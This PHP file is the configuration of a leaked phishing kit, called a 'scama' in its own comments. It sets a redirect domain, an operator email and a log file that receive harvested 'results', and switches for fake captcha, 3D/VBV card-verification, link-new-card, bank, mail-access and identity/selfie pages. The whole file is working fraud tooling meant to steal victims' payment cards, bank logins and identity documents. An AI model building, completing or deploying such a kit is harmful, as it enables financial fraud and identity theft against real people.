<?php
/*
▄▄▌  ▄▄▄ . ▄▄▄· ▄ •▄  ▄▄·       ·▄▄▄▄  ▄▄▄ .
██•  ▀▄.▀·▐█ ▀█ █▌▄▌▪▐█ ▌▪▪     ██▪ ██ ▀▄.▀·
██▪  ▐▀▀▪▄▄█▀▀█ ▐▀▀▄·██ ▄▄ ▄█▀▄ ▐█· ▐█▌▐▀▀▪▄
▐█▌▐▌▐█▄▄▌▐█ ▪▐▌▐█.█▌▐███▌▐█▌.▐▌██. ██ ▐█▄▄▌
.▀▀▀  ▀▀▀  ▀  ▀ ·▀  ▀·▀▀▀  ▀█▄▀▪▀▀▀▀▀•  ▀▀▀ 
FuCkEd By [!]DNThirTeen
https://www.facebook.com/groups/L34K.C0de/
*/
	/*
	# -> All Created By SH33NZ0
	# -> https://www.facebook.com/x.SH33NZ0
	# -> ICQ : 740936161
	# -> // : Instructions
	*/
	// ================================= //
	// ================================= //
	$redirectlink = "help-service.email";	 	 // You must use redirect or the scam will not open
	// ================================= //
	// ================================= //
	// This is your Scama Key if you post the scam will banned Don`t edit it =D
	$API_KEY = "Fucked_By_DNThirTeen_L34kC0de";
	// This is your Scama Key if you post the scam will banned Don`t edit it =D
	// ================================= //
	// ================================= //
	$scamname = "KingKhan"; // *Change |xAthena| to any name you want |Your Nick Name|
	// ================================= //
	// ================================= //
	$saveintext = "yes";   // If you don`t want the scam save the Rezlt/ Result in Text Edit |yes| to |no|
	$filename = "K4sTr0"; // Change |stored| to any name you want this will be the Rzlt file name
	// ================================= //
	// ================================= //
	$sendtoemail = "yes";  // If you don`t want the scam Send the Rezlt/ Result to email Edit |yes| to |no|
	$yours = "dr.injectioni@protonmail.com"; 	 // Edit this to your email 
	// ================================= //
	// ================================= //
	$true_login ="no";                   // If you don`t want to show ||Captcha Page|| edit |yes| to |no| 
	$show_captcha ="no"; 				 // If you don`t want to show ||Captcha Page|| edit |yes| to |no| 
	$show_unusual_activity ="no"; 		 // If you don`t want to show ||Unusual Activity|| edit |yes| to |no|
	$show_3D_VBV ="yes"; 				 // If you don`t want to show ||3D/VBV Page|| edit |yes| to |no| 
	$show_newcard ="yes"; 				 // If you don`t want to show ||Link New Card Page|| edit |yes| to |no|
	$show_mailaccess ="no"; 			 // If you don`t want to show ||Mail Access Page|| edit |yes| to |no| 
	$show_bank ="no"; 					 // If you don`t want to show ||Bank Page|| edit |yes| to |no| 
	$show_identity ="no"; 				 // If you don`t want to show ||Identity/Selfiy|| edit |yes| to |no| 
	// ================================= //
	// ================================= //
	/////////////////DATE-function//////////////////////
	function now() {
		date_default_timezone_set('GMT');
		return date("d/m/Y h:i:sa");
	}
	/////////////////DATE-function//////////////////////

?>
